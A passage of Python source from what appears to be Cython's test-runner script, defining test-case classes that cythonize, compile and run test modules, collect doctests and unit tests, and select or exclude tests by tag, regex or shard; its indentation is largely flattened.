if argument.strip() == 'language' and value.strip() == 'c++':
return True
return False
def filter_stderr(stderr_bytes):
"""
Filter annoying warnings from output.
"""
if b"Command line warning D9025" in stderr_bytes:
        # MSVC: cl : Command line warning D9025 : overriding '/Ox' with '/Od'
stderr_bytes = b'\n'.join(
line for line in stderr_bytes.splitlines()
if b"Command line warning D9025" not in line)
return stderr_bytes
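# Base test case: cythonizes a single test module, optionally compiles it with
# distutils, and compares the emitted errors/warnings against the expectations
# embedded in the test source.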
class CythonCompileTestCase(unittest.TestCase):
def __init__(self, test_directory, workdir, module, tags, language='c', preparse='id',
expect_errors=False, expect_warnings=False, annotate=False, cleanup_workdir=True,
cleanup_sharedlibs=True, cleanup_failures=True, cython_only=False,
fork=True, language_level=2, warning_errors=False,
test_determinism=False,
common_utility_dir=None, pythran_dir=None, stats=None):
self.test_directory = test_directory
self.tags = tags
self.workdir = workdir
self.module = module
self.language = language
self.preparse = preparse
self.name = module if self.preparse == "id" else "%s_%s" % (module, preparse)
self.expect_errors = expect_errors
self.expect_warnings = expect_warnings
self.annotate = annotate
self.cleanup_workdir = cleanup_workdir
self.cleanup_sharedlibs = cleanup_sharedlibs
self.cleanup_failures = cleanup_failures
self.cython_only = cython_only
self.fork = fork
self.language_level = language_level
self.warning_errors = warning_errors
self.test_determinism = test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.stats = stats
unittest.TestCase.__init__(self)
def shortDescription(self):
return "compiling (%s%s%s) %s" % (
self.language,
"/cy2" if self.language_level == 2 else "/cy3" if self.language_level == 3 else "",
"/pythran" if self.pythran_dir is not None else "",
self.description_name()
)
def description_name(self):
return self.name
def setUp(self):
from Cython.Compiler import Options
self._saved_options = [
(name, getattr(Options, name))
for name in ('warning_errors', 'clear_to_none', 'error_on_unknown_names', 'error_on_uninitialized')
]
self._saved_default_directives = list(Options.get_directive_defaults().items())
Options.warning_errors = self.warning_errors
if sys.version_info >= (3, 4):
Options._directive_defaults['autotestdict'] = False
if not os.path.exists(self.workdir):
os.makedirs(self.workdir)
if self.workdir not in sys.path:
sys.path.insert(0, self.workdir)
def tearDown(self):
from Cython.Compiler import Options
for name, value in self._saved_options:
setattr(Options, name, value)
Options._directive_defaults = dict(self._saved_default_directives)
unpatch_inspect_isfunction()
try:
sys.path.remove(self.workdir)
except ValueError:
pass
try:
del sys.modules[self.module]
except KeyError:
pass
cleanup = self.cleanup_failures or self.success
cleanup_c_files = WITH_CYTHON and self.cleanup_workdir and cleanup
cleanup_lib_files = self.cleanup_sharedlibs and cleanup
is_cygwin = sys.platform == 'cygwin'
if os.path.exists(self.workdir):
if cleanup_c_files and cleanup_lib_files and not is_cygwin:
shutil.rmtree(self.workdir, ignore_errors=True)
else:
for rmfile in os.listdir(self.workdir):
ext = os.path.splitext(rmfile)[1]
if not cleanup_c_files:
# Keep C, C++ files, header files, preprocessed sources
# and assembly sources (typically the .i and .s files
# are intentionally generated when -save-temps is given)
if ext in (".c", ".cpp", ".h", ".i", ".ii", ".s"):
continue
if ext == ".html" and rmfile.startswith(self.module):
continue
is_shared_obj = ext in (".so", ".dll")
if not cleanup_lib_files and is_shared_obj:
continue
try:
rmfile = os.path.join(self.workdir, rmfile)
if os.path.isdir(rmfile):
shutil.rmtree(rmfile, ignore_errors=True)
elif is_cygwin and is_shared_obj:
# Delete later
_to_clean.append(rmfile)
else:
os.remove(rmfile)
except IOError:
pass
if cleanup_c_files and cleanup_lib_files and is_cygwin:
# Finally, remove the work dir itself
_to_clean.append(self.workdir)
if cleanup_c_files and os.path.exists(self.workdir + '-again'):
shutil.rmtree(self.workdir + '-again', ignore_errors=True)
def runTest(self):
self.success = False
self.runCompileTest()
self.success = True
def runCompileTest(self):
return self.compile(
self.test_directory, self.module, self.workdir,
self.test_directory, self.expect_errors, self.expect_warnings, self.annotate)
def find_module_source_file(self, source_file):
if not os.path.exists(source_file):
source_file = source_file[:-1]
return source_file
def build_target_filename(self, module_name):
target = '%s.%s' % (module_name, self.language)
return target
def related_files(self, test_directory, module_name):
is_related = re.compile('%s_.*[.].*' % module_name).match
return [filename for filename in list_unchanging_dir(test_directory)
if is_related(filename)]
def copy_files(self, test_directory, target_directory, file_list):
if self.preparse and self.preparse != 'id':
preparse_func = globals()[self.preparse]
def copy(src, dest):
with open(src) as fin:
with open(dest, 'w') as fout:
fout.write(preparse_func(fin.read()))
else:
# use symlink on Unix, copy on Windows
try:
copy = os.symlink
except AttributeError:
copy = shutil.copy
join = os.path.join
for filename in file_list:
file_path = join(test_directory, filename)
if os.path.exists(file_path):
copy(file_path, join(target_directory, filename))
def source_files(self, workdir, module_name, file_list):
return ([self.build_target_filename(module_name)] +
[filename for filename in file_list
if not os.path.isfile(os.path.join(workdir, filename))])
def split_source_and_output(self, test_directory, module, workdir):
source_file = self.find_module_source_file(os.path.join(test_directory, module) + '.pyx')
from Cython.Utils import detect_opened_file_encoding
with io_open(source_file, 'rb') as f:
# encoding is passed to ErrorWriter but not used on the source
# since it is sometimes deliberately wrong
encoding = detect_opened_file_encoding(f, default=None)
with io_open(source_file, 'r', encoding='ISO-8859-1') as source_and_output:
error_writer = warnings_writer = None
out = io_open(os.path.join(workdir, module + os.path.splitext(source_file)[1]),
'w', encoding='ISO-8859-1')
try:
for line in source_and_output:
if line.startswith("_ERRORS"):
out.close()
out = error_writer = ErrorWriter(encoding=encoding)
elif line.startswith("_WARNINGS"):
out.close()
out = warnings_writer = ErrorWriter(encoding=encoding)
else:
out.write(line)
finally:
out.close()
return (error_writer.geterrors() if error_writer else [],
warnings_writer.geterrors() if warnings_writer else [])
def run_cython(self, test_directory, module, targetdir, incdir, annotate,
extra_compile_options=None):
include_dirs = INCLUDE_DIRS + [os.path.join(test_directory, '..', TEST_SUPPORT_DIR)]
if incdir:
include_dirs.append(incdir)
if self.preparse == 'id':
source = self.find_module_source_file(
os.path.join(test_directory, module + '.pyx'))
else:
self.copy_files(test_directory, targetdir, [module + '.pyx'])
source = os.path.join(targetdir, module + '.pyx')
target = os.path.join(targetdir, self.build_target_filename(module))
if extra_compile_options is None:
extra_compile_options = {}
if 'allow_unknown_names' in self.tags['tag']:
from Cython.Compiler import Options
Options.error_on_unknown_names = False
try:
CompilationOptions
except NameError:
from Cython.Compiler.Options import CompilationOptions
from Cython.Compiler.Main import compile as cython_compile
from Cython.Compiler.Options import default_options
common_utility_include_dir = self.common_utility_dir
options = CompilationOptions(
default_options,
include_path = include_dirs,
output_file = target,
annotate = annotate,
use_listing_file = False,
cplus = self.language == 'cpp',
np_pythran = self.pythran_dir is not None,
language_level = self.language_level,
generate_pxi = False,
evaluate_tree_assertions = True,
common_utility_include_dir = common_utility_include_dir,
**extra_compile_options
)
cython_compile(source, options=options,
full_module_name=module)
def run_distutils(self, test_directory, module, workdir, incdir,
extra_extension_args=None):
cwd = os.getcwd()
os.chdir(workdir)
try:
build_extension = build_ext(get_distutils_distro())
build_extension.include_dirs = INCLUDE_DIRS[:]
if incdir:
build_extension.include_dirs.append(incdir)
build_extension.finalize_options()
if COMPILER:
build_extension.compiler = COMPILER
ext_compile_flags = CFLAGS[:]
if build_extension.compiler == 'mingw32':
ext_compile_flags.append('-Wno-format')
if extra_extension_args is None:
extra_extension_args = {}
related_files = self.related_files(test_directory, module)
self.copy_files(test_directory, workdir, related_files)
from distutils.core import Extension
extension = Extension(
module,
sources=self.source_files(workdir, module, related_files),
extra_compile_args=ext_compile_flags,
**extra_extension_args
)
if self.language == 'cpp':
# Set the language now as the fixer might need it
extension.language = 'c++'
if 'distutils' in self.tags:
from Cython.Build.Dependencies import DistutilsInfo
from Cython.Utils import open_source_file
pyx_path = os.path.join(self.test_directory, self.module + ".pyx")
with open_source_file(pyx_path) as f:
DistutilsInfo(f).apply(extension)
if self.pythran_dir:
from Cython.Build.Dependencies import update_pythran_extension
update_pythran_extension(extension)
# Compile with -DCYTHON_CLINE_IN_TRACEBACK=1 unless we have
# the "traceback" tag
if 'traceback' not in self.tags['tag']:
extension.define_macros.append(("CYTHON_CLINE_IN_TRACEBACK", 1))
for matcher, fixer in list(EXT_EXTRAS.items()):
if isinstance(matcher, str):
# lazy init
del EXT_EXTRAS[matcher]
matcher = string_selector(matcher)
EXT_EXTRAS[matcher] = fixer
if matcher(module, self.tags):
newext = fixer(extension)
if newext is EXCLUDE_EXT:
return skip_test("Test '%s' excluded due to tags '%s'" % (
self.name, ', '.join(self.tags.get('tag', ''))))
extension = newext or extension
if self.language == 'cpp':
extension.language = 'c++'
if IS_PY2:
workdir = str(workdir) # work around type check in distutils that disallows unicode strings
build_extension.extensions = [extension]
build_extension.build_temp = workdir
build_extension.build_lib = workdir
build_extension.run()
finally:
os.chdir(cwd)
try:
get_ext_fullpath = build_extension.get_ext_fullpath
except AttributeError:
def get_ext_fullpath(ext_name, self=build_extension):
# copied from distutils.command.build_ext (missing in Py2.[45])
fullname = self.get_ext_fullname(ext_name)
modpath = fullname.split('.')
filename = self.get_ext_filename(modpath[-1])
if not self.inplace:
filename = os.path.join(*modpath[:-1]+[filename])
return os.path.join(self.build_lib, filename)
package = '.'.join(modpath[0:-1])
build_py = self.get_finalized_command('build_py')
package_dir = os.path.abspath(build_py.get_package_dir(package))
return os.path.join(package_dir, filename)
return get_ext_fullpath(module)
def compile(self, test_directory, module, workdir, incdir,
expect_errors, expect_warnings, annotate):
expected_errors = expected_warnings = errors = warnings = ()
if expect_errors or expect_warnings:
expected_errors, expected_warnings = self.split_source_and_output(
test_directory, module, workdir)
test_directory = workdir
if WITH_CYTHON:
old_stderr = sys.stderr
try:
sys.stderr = ErrorWriter()
with self.stats.time(self.name, self.language, 'cython'):
self.run_cython(test_directory, module, workdir, incdir, annotate)
errors, warnings = sys.stderr.getall()
finally:
sys.stderr = old_stderr
if self.test_determinism and not expect_errors:
workdir2 = workdir + '-again'
os.mkdir(workdir2)
self.run_cython(test_directory, module, workdir2, incdir, annotate)
diffs = []
for file in os.listdir(workdir2):
if (open(os.path.join(workdir, file)).read()
!= open(os.path.join(workdir2, file)).read()):
diffs.append(file)
os.system('diff -u %s/%s %s/%s > %s/%s.diff' % (
workdir, file,
workdir2, file,
workdir2, file))
if diffs:
self.fail('Nondeterministic file generation: %s' % ', '.join(diffs))
tostderr = sys.__stderr__.write
if expected_warnings or (expect_warnings and warnings):
self._match_output(expected_warnings, warnings, tostderr)
if 'cerror' in self.tags['tag']:
if errors:
tostderr("\n=== Expected C compile error ===\n")
tostderr("\n=== Got Cython errors: ===\n")
tostderr('\n'.join(errors))
tostderr('\n\n')
raise RuntimeError('should have generated extension code')
elif errors or expected_errors:
self._match_output(expected_errors, errors, tostderr)
return None
so_path = None
if not self.cython_only:
from Cython.Utils import captured_fd, print_bytes
from distutils.errors import CompileError, LinkError
show_output = True
get_stderr = get_stdout = None
try:
with captured_fd(1) as get_stdout:
with captured_fd(2) as get_stderr:
with self.stats.time(self.name, self.language, 'compile-%s' % self.language):
so_path = self.run_distutils(test_directory, module, workdir, incdir)
except Exception as exc:
if ('cerror' in self.tags['tag'] and
((get_stderr and get_stderr()) or
isinstance(exc, (CompileError, LinkError)))):
show_output = False # expected C compiler failure
else:
raise
else:
if 'cerror' in self.tags['tag']:
raise RuntimeError('should have failed C compile')
finally:
if show_output:
stdout = get_stdout and get_stdout().strip()
if stdout:
print_bytes(
stdout, header_text="\n=== C/C++ compiler output: =========\n",
end=None, file=sys.__stderr__)
stderr = get_stderr and filter_stderr(get_stderr()).strip()
if stderr:
print_bytes(
stderr, header_text="\n=== C/C++ compiler error output: ===\n",
end=None, file=sys.__stderr__)
if stdout or stderr:
tostderr("\n====================================\n")
return so_path
def _match_output(self, expected_output, actual_output, write):
try:
for expected, actual in zip(expected_output, actual_output):
self.assertEqual(expected, actual)
if len(actual_output) < len(expected_output):
expected = expected_output[len(actual_output)]
self.assertEqual(expected, None)
elif len(actual_output) > len(expected_output):
unexpected = actual_output[len(expected_output)]
self.assertEqual(None, unexpected)
except AssertionError:
write("\n=== Expected: ===\n")
write('\n'.join(expected_output))
write("\n\n=== Got: ===\n")
write('\n'.join(actual_output))
write('\n\n')
raise
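# Extends the compile test by importing the built extension module and running
# its doctests, in a forked child process where possible.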
class CythonRunTestCase(CythonCompileTestCase):
def setUp(self):
CythonCompileTestCase.setUp(self)
from Cython.Compiler import Options
Options.clear_to_none = False
def description_name(self):
return self.name if self.cython_only else "and running %s" % self.name
def run(self, result=None):
if result is None:
result = self.defaultTestResult()
result.startTest(self)
try:
self.setUp()
try:
self.success = False
ext_so_path = self.runCompileTest()
failures, errors, skipped = len(result.failures), len(result.errors), len(result.skipped)
if not self.cython_only and ext_so_path is not None:
self.run_tests(result, ext_so_path)
if failures == len(result.failures) and errors == len(result.errors):
# No new errors...
self.success = True
finally:
check_thread_termination()
except SkipTest as exc:
result.addSkip(self, str(exc))
result.stopTest(self)
except Exception:
result.addError(self, sys.exc_info())
result.stopTest(self)
try:
self.tearDown()
except Exception:
pass
def run_tests(self, result, ext_so_path):
self.run_doctests(self.module, result, ext_so_path)
def run_doctests(self, module_or_name, result, ext_so_path):
def run_test(result):
if isinstance(module_or_name, basestring):
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(module_or_name, ext_so_path)
else:
module = module_or_name
tests = doctest.DocTestSuite(module)
with self.stats.time(self.name, self.language, 'run'):
tests.run(result)
run_forked_test(result, run_test, self.shortDescription(), self.fork)
def run_forked_test(result, run_func, test_name, fork=True):
if not fork or sys.version_info[0] >= 3 or not hasattr(os, 'fork'):
run_func(result)
sys.stdout.flush()
sys.stderr.flush()
gc.collect()
return
# fork to make sure we do not keep the tested module loaded
result_handle, result_file = tempfile.mkstemp()
os.close(result_handle)
child_id = os.fork()
if not child_id:
result_code = 0
try:
try:
tests = partial_result = None
try:
partial_result = PartialTestResult(result)
run_func(partial_result)
sys.stdout.flush()
sys.stderr.flush()
gc.collect()
except Exception:
result_code = 1
if partial_result is not None:
if tests is None:
# importing failed, try to fake a test class
tests = _FakeClass(
failureException=sys.exc_info()[1],
_shortDescription=test_name,
module_name=None)
partial_result.addError(tests, sys.exc_info())
if partial_result is not None:
with open(result_file, 'wb') as output:
pickle.dump(partial_result.data(), output)
except:
traceback.print_exc()
finally:
try: sys.stderr.flush()
except: pass
try: sys.stdout.flush()
except: pass
os._exit(result_code)
try:
cid, result_code = os.waitpid(child_id, 0)
module_name = test_name.split()[-1]
# os.waitpid returns the child's result code in the
# upper byte of result_code, and the signal it was
# killed by in the lower byte
if result_code & 255:
raise Exception(
"Tests in module '%s' were unexpectedly killed by signal %d, see test output for details." % (
module_name, result_code & 255))
result_code >>= 8
if result_code in (0,1):
try:
with open(result_file, 'rb') as f:
PartialTestResult.join_results(result, pickle.load(f))
except Exception:
raise Exception(
"Failed to load test result from test in module '%s' after exit status %d,"
" see test output for details." % (module_name, result_code))
if result_code:
raise Exception(
"Tests in module '%s' exited with status %d, see test output for details." % (
module_name, result_code))
finally:
try:
os.unlink(result_file)
except:
pass
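# Runs the plain Python version of a test (without Cython) through doctest,
# and additionally through mypy for tests tagged 'mypy'.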
class PureDoctestTestCase(unittest.TestCase):
def __init__(self, module_name, module_path, tags, stats=None):
self.tags = tags
self.module_name = self.name = module_name
self.module_path = module_path
self.stats = stats
unittest.TestCase.__init__(self, 'run')
def shortDescription(self):
return "running pure doctests in %s" % self.module_name
def run(self, result=None):
if result is None:
result = self.defaultTestResult()
loaded_module_name = 'pure_doctest__' + self.module_name
result.startTest(self)
try:
self.setUp()
import imp
with self.stats.time(self.name, 'py', 'pyimport'):
m = imp.load_source(loaded_module_name, self.module_path)
try:
with self.stats.time(self.name, 'py', 'pyrun'):
doctest.DocTestSuite(m).run(result)
finally:
del m
if loaded_module_name in sys.modules:
del sys.modules[loaded_module_name]
check_thread_termination()
except Exception:
result.addError(self, sys.exc_info())
result.stopTest(self)
try:
self.tearDown()
except Exception:
pass
if 'mypy' in self.tags['tag']:
try:
from mypy import api as mypy_api
except ImportError:
pass
else:
with self.stats.time(self.name, 'py', 'mypy'):
mypy_result = mypy_api.run([
self.module_path,
'--ignore-missing-imports',
'--follow-imports', 'skip',
])
if mypy_result[2]:
self.fail(mypy_result[0])
is_private_field = re.compile('^_[^_]').match
class _FakeClass(object):
def __init__(self, **kwargs):
self._shortDescription = kwargs.get('module_name')
self.__dict__.update(kwargs)
def shortDescription(self):
return self._shortDescription
try: # Py2.7+ and Py3.2+
from unittest.runner import _TextTestResult
except ImportError:
from unittest import _TextTestResult
class PartialTestResult(_TextTestResult):
def __init__(self, base_result):
_TextTestResult.__init__(
self, self._StringIO(), True,
base_result.dots + base_result.showAll*2)
def strip_error_results(self, results):
for test_case, error in results:
for attr_name in filter(is_private_field, dir(test_case)):
if attr_name == '_dt_test':
test_case._dt_test = _FakeClass(
name=test_case._dt_test.name)
elif attr_name != '_shortDescription':
setattr(test_case, attr_name, None)
def data(self):
self.strip_error_results(self.failures)
self.strip_error_results(self.errors)
return (self.failures, self.errors, self.skipped, self.testsRun,
self.stream.getvalue())
def join_results(result, data):
"""Static method for merging the result back into the main
result object.
"""
failures, errors, skipped, tests_run, output = data
if output:
result.stream.write(output)
result.errors.extend(errors)
result.skipped.extend(skipped)
result.failures.extend(failures)
result.testsRun += tests_run
join_results = staticmethod(join_results)
class _StringIO(StringIO):
def writeln(self, line):
self.write("%s\n" % line)
class CythonUnitTestCase(CythonRunTestCase):
def shortDescription(self):
return "compiling (%s) tests in %s" % (self.language, self.description_name())
def run_tests(self, result, ext_so_path):
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(self.module, ext_so_path)
tests = unittest.defaultTestLoader.loadTestsFromModule(module)
with self.stats.time(self.name, self.language, 'run'):
tests.run(result)
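# Runs CPython's own regression tests after compiling them with Cython,
# redirecting test.support's run_unittest/run_doctest helpers to the local
# result object.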
class CythonPyregrTestCase(CythonRunTestCase):
def setUp(self):
CythonRunTestCase.setUp(self)
from Cython.Compiler import Options
Options.error_on_unknown_names = False
Options.error_on_uninitialized = False
Options._directive_defaults.update(dict(
binding=True, always_allow_keywords=True,
set_initial_path="SOURCEFILE"))
patch_inspect_isfunction()
def related_files(self, test_directory, module_name):
return _list_pyregr_data_files(test_directory)
def _run_unittest(self, result, *classes):
"""Run tests from unittest.TestCase-derived classes."""
valid_types = (unittest.TestSuite, unittest.TestCase)
suite = unittest.TestSuite()
for cls in classes:
if isinstance(cls, str):
if cls in sys.modules:
suite.addTest(unittest.findTestCases(sys.modules[cls]))
else:
raise ValueError("str arguments must be keys in sys.modules")
elif isinstance(cls, valid_types):
suite.addTest(cls)
else:
suite.addTest(unittest.makeSuite(cls))
with self.stats.time(self.name, self.language, 'run'):
suite.run(result)
def _run_doctest(self, result, module):
self.run_doctests(module, result, None)
def run_tests(self, result, ext_so_path):
try:
from test import support
except ImportError: # Python2.x
from test import test_support as support
def run_test(result):
def run_unittest(*classes):
return self._run_unittest(result, *classes)
def run_doctest(module, verbosity=None):
return self._run_doctest(result, module)
backup = (support.run_unittest, support.run_doctest)
support.run_unittest = run_unittest
support.run_doctest = run_doctest
try:
try:
sys.stdout.flush() # helps in case of crashes
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(self.module, ext_so_path)
sys.stdout.flush() # helps in case of crashes
if hasattr(module, 'test_main'):
# help 'doctest.DocFileTest' find the module path through frame inspection
fake_caller_module_globals = {
'module': module,
'__name__': module.__name__,
}
call_tests = eval(
'lambda: module.test_main()',
fake_caller_module_globals, fake_caller_module_globals)
call_tests()
sys.stdout.flush() # helps in case of crashes
except (unittest.SkipTest, support.ResourceDenied):
result.addSkip(self, 'ok')
finally:
support.run_unittest, support.run_doctest = backup
run_forked_test(result, run_test, self.shortDescription(), self.fork)
class TestCodeFormat(unittest.TestCase):
def __init__(self, cython_dir):
self.cython_dir = cython_dir
unittest.TestCase.__init__(self)
def runTest(self):
import pycodestyle
config_file = os.path.join(self.cython_dir, "setup.cfg")
if not os.path.exists(config_file):
config_file=os.path.join(os.path.dirname(__file__), "setup.cfg")
paths = []
for codedir in ['Cython', 'Demos', 'docs', 'pyximport', 'tests']:
paths += glob.glob(os.path.join(self.cython_dir, codedir + "/**/*.py"), recursive=True)
style = pycodestyle.StyleGuide(config_file=config_file)
print("") # Fix the first line of the report.
result = style.check_files(paths)
self.assertEqual(result.total_errors, 0, "Found code style errors.")
include_debugger = IS_CPYTHON
def collect_unittests(path, module_prefix, suite, selectors, exclude_selectors):
def file_matches(filename):
return filename.startswith("Test") and filename.endswith(".py")
def package_matches(dirname):
return dirname == "Tests"
loader = unittest.TestLoader()
if include_debugger:
skipped_dirs = []
else:
skipped_dirs = ['Cython' + os.path.sep + 'Debugger' + os.path.sep]
for dirpath, dirnames, filenames in os.walk(path):
if dirpath != path and "__init__.py" not in filenames:
skipped_dirs.append(dirpath + os.path.sep)
continue
skip = False
for dir in skipped_dirs:
if dirpath.startswith(dir):
skip = True
if skip:
continue
parentname = os.path.split(dirpath)[-1]
if package_matches(parentname):
for f in filenames:
if file_matches(f):
filepath = os.path.join(dirpath, f)[:-len(".py")]
modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
if not any(1 for match in selectors if match(modulename)):
continue
if any(1 for match in exclude_selectors if match(modulename)):
continue
module = __import__(modulename)
for x in modulename.split('.')[1:]:
module = getattr(module, x)
suite.addTests([loader.loadTestsFromModule(module)])
def collect_doctests(path, module_prefix, suite, selectors, exclude_selectors):
def package_matches(dirname):
if dirname == 'Debugger' and not include_debugger:
return False
return dirname not in ("Mac", "Distutils", "Plex", "Tempita")
def file_matches(filename):
filename, ext = os.path.splitext(filename)
blacklist = ['libcython', 'libpython', 'test_libcython_in_gdb',
'TestLibCython']
return (ext == '.py' and not
'~' in filename and not
'#' in filename and not
filename.startswith('.') and not
filename in blacklist)
import doctest
for dirpath, dirnames, filenames in os.walk(path):
for dir in list(dirnames):
if not package_matches(dir):
dirnames.remove(dir)
for f in filenames:
if file_matches(f):
if not f.endswith('.py'): continue
filepath = os.path.join(dirpath, f)
if os.path.getsize(filepath) == 0: continue
filepath = filepath[:-len(".py")]
modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
if not [ 1 for match in selectors if match(modulename) ]:
continue
if [ 1 for match in exclude_selectors if match(modulename) ]:
continue
if 'in_gdb' in modulename:
# These should only be imported from gdb.
continue
module = __import__(modulename)
for x in modulename.split('.')[1:]:
module = getattr(module, x)
if hasattr(module, "__doc__") or hasattr(module, "__test__"):
try:
suite.addTest(doctest.DocTestSuite(module))
except ValueError: # no tests
pass
class EndToEndTest(unittest.TestCase):
"""
This is a test of build/*.srctree files, where srctree defines a full
directory structure and its header gives a list of commands to run.
"""
cython_root = os.path.dirname(os.path.abspath(__file__))
def __init__(self, treefile, workdir, cleanup_workdir=True, stats=None,
capture=True):
self.name = os.path.splitext(os.path.basename(treefile))[0]
self.treefile = treefile
self.workdir = os.path.join(workdir, self.name)
self.cleanup_workdir = cleanup_workdir
self.stats = stats
self.capture = capture
cython_syspath = [self.cython_root]
for path in sys.path:
if path.startswith(self.cython_root) and path not in cython_syspath:
# Py3 installation and refnanny build prepend their
# fixed paths to sys.path => prefer that over the
# generic one (cython_root itself goes last)
cython_syspath.append(path)
self.cython_syspath = os.pathsep.join(cython_syspath[::-1])
unittest.TestCase.__init__(self)
def shortDescription(self):
return "End-to-end %s" % self.name
def setUp(self):
from Cython.TestUtils import unpack_source_tree
_, self.commands = unpack_source_tree(self.treefile, self.workdir, self.cython_root)
self.old_dir = os.getcwd()
os.chdir(self.workdir)
if self.workdir not in sys.path:
sys.path.insert(0, self.workdir)
def tearDown(self):
if self.cleanup_workdir:
for trial in range(5):
try:
shutil.rmtree(self.workdir)
except OSError:
time.sleep(0.1)
else:
break
os.chdir(self.old_dir)
def _try_decode(self, content):
try:
return content.decode()
except UnicodeDecodeError:
return content.decode('iso-8859-1')
def runTest(self):
self.success = False
old_path = os.environ.get('PYTHONPATH')
env = dict(os.environ)
new_path = self.cython_syspath
if old_path:
new_path = new_path + os.pathsep + old_path
env['PYTHONPATH'] = new_path
cmd = []
out = []
err = []
for command_no, command in enumerate(self.commands, 1):
with self.stats.time('%s(%d)' % (self.name, command_no), 'c',
'etoe-build' if 'setup.py' in command else 'etoe-run'):
if self.capture:
p = subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE, env=env)
_out, _err = p.communicate()
res = p.returncode
else:
p = subprocess.call(command, env=env)
_out, _err = b'', b''
res = p
cmd.append(command)
out.append(_out)
err.append(_err)
if res != 0:
for c, o, e in zip(cmd, out, err):
sys.stderr.write("%s\n%s\n%s\n\n" % (
c, self._try_decode(o), self._try_decode(e)))
self.assertEqual(0, res, "non-zero exit status")
self.success = True
# TODO: Support cython_freeze needed here as well.
# TODO: Windows support.
class EmbedTest(unittest.TestCase):
working_dir = "Demos/embed"
def setUp(self):
self.old_dir = os.getcwd()
os.chdir(self.working_dir)
os.system(
"make PYTHON='%s' clean > /dev/null" % sys.executable)
def tearDown(self):
try:
os.system(
"make PYTHON='%s' clean > /dev/null" % sys.executable)
except:
pass
os.chdir(self.old_dir)
def test_embed(self):
libname = sysconfig.get_config_var('LIBRARY')
libdir = sysconfig.get_config_var('LIBDIR')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
libdir = os.path.join(os.path.dirname(sys.executable), '..', 'lib')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
libdir = os.path.join(libdir, 'python%d.%d' % sys.version_info[:2], 'config')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
# report the error for the original directory
libdir = sysconfig.get_config_var('LIBDIR')
cython = 'cython.py'
if sys.version_info[0] >=3 and CY3_DIR:
cython = os.path.join(CY3_DIR, cython)
cython = os.path.abspath(os.path.join('..', '..', cython))
self.assertEqual(0, os.system(
"make PYTHON='%s' CYTHON='%s' LIBDIR1='%s' test > make.output" % (sys.executable, cython, libdir)))
try:
os.remove('make.output')
except OSError:
pass
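# Excludes tests whose optional dependency module (e.g. numpy) cannot be imported.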
class MissingDependencyExcluder(object):
def __init__(self, deps):
# deps: { matcher func : module name }
self.exclude_matchers = []
for matcher, mod in deps.items():
try:
__import__(mod)
except ImportError:
self.exclude_matchers.append(string_selector(matcher))
self.tests_missing_deps = []
def __call__(self, testname, tags=None):
for matcher in self.exclude_matchers:
if matcher(testname, tags):
self.tests_missing_deps.append(testname)
return True
return False
class VersionDependencyExcluder(object):
def __init__(self, deps):
# deps: { version : matcher func }
from sys import version_info
self.exclude_matchers = []
for ver, (compare, matcher) in deps.items():
if compare(version_info, ver):
self.exclude_matchers.append(matcher)
self.tests_missing_deps = []
def __call__(self, testname, tags=None):
for matcher in self.exclude_matchers:
if matcher(testname):
self.tests_missing_deps.append(testname)
return True
return False
class FileListExcluder(object):
def __init__(self, list_file, verbose=False):
self.verbose = verbose
self.excludes = {}
self._list_file = os.path.relpath(list_file)
with open(list_file) as f:
for line in f:
line = line.strip()
if line and line[0] != '#':
self.excludes[line.split()[0]] = True
def __call__(self, testname, tags=None):
exclude = (testname in self.excludes
or testname.split('.')[-1] in self.excludes)
if exclude and self.verbose:
print("Excluding %s because it's listed in %s"
% (testname, self._list_file))
return exclude
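# Test selectors: TagsSelector matches against the parsed '# tag:'-style
# directives, RegExSelector against the test name.  string_selector() below
# builds one from a command-line argument, e.g. "tag:numpy" becomes
# TagsSelector('tag', 'numpy') while a plain pattern like "run.qualname"
# becomes a case-insensitive RegExSelector.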
class TagsSelector(object):
def __init__(self, tag, value):
self.tag = tag
self.value = value
def __call__(self, testname, tags=None):
if tags is None:
return False
else:
return self.value in tags[self.tag]
class RegExSelector(object):
def __init__(self, pattern_string):
try:
self.regex_matches = re.compile(pattern_string, re.I|re.U).search
except re.error:
print('Invalid pattern: %r' % pattern_string)
raise
def __call__(self, testname, tags=None):
return self.regex_matches(testname)
def string_selector(s):
if ':' in s:
return TagsSelector(*s.split(':', 1))
else:
return RegExSelector(s)
class ShardExcludeSelector(object):
# This is an exclude selector so it can override the (include) selectors.
    # It may not provide a uniform distribution (in time or count), but it is a
    # deterministic partition of the tests, which is what matters here.
def __init__(self, shard_num, shard_count):
self.shard_num = shard_num
self.shard_count = shard_count
def __call__(self, testname, tags=None, _hash=zlib.crc32, _is_py2=IS_PY2):
# Cannot use simple hash() here as shard processes might use different hash seeds.
# CRC32 is fast and simple, but might return negative values in Py2.
hashval = _hash(testname) & 0x7fffffff if _is_py2 else _hash(testname.encode())
return hashval % self.shard_count != self.shard_num
class PendingThreadsError(RuntimeError):
pass
threads_seen = []
def check_thread_termination(ignore_seen=True):
if threading is None: # no threading enabled in CPython
return
current = threading.current_thread()
blocking_threads = []
for t in threading.enumerate():
if not t.is_alive() or t == current or t.name == 'time_stamper':
continue
t.join(timeout=2)
if t.is_alive():
if not ignore_seen:
blocking_threads.append(t)
continue
for seen in threads_seen:
if t is seen:
break
else:
threads_seen.append(t)
blocking_threads.append(t)
if not blocking_threads:
return
sys.stderr.write("warning: left-over threads found after running test:\n")
for t in blocking_threads:
sys.stderr.write('...%s\n' % repr(t))
raise PendingThreadsError("left-over threads found after running test")
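# Return the combined stdout/stderr of a command as text, or '' if the command
# cannot be started.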
def subprocess_output(cmd):
try:
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return p.communicate()[0].decode('UTF-8')
except OSError:
return ''
def get_version():
from Cython.Compiler.Version import version as cython_version
full_version = cython_version
top = os.path.dirname(os.path.abspath(__file__))
if os.path.exists(os.path.join(top, '.git')):
old_dir = os.getcwd()
try:
os.chdir(top)
head_commit = subprocess_output(['git', 'rev-parse', 'HEAD']).strip()
version_commit = subprocess_output(['git', 'rev-parse', cython_version]).strip()
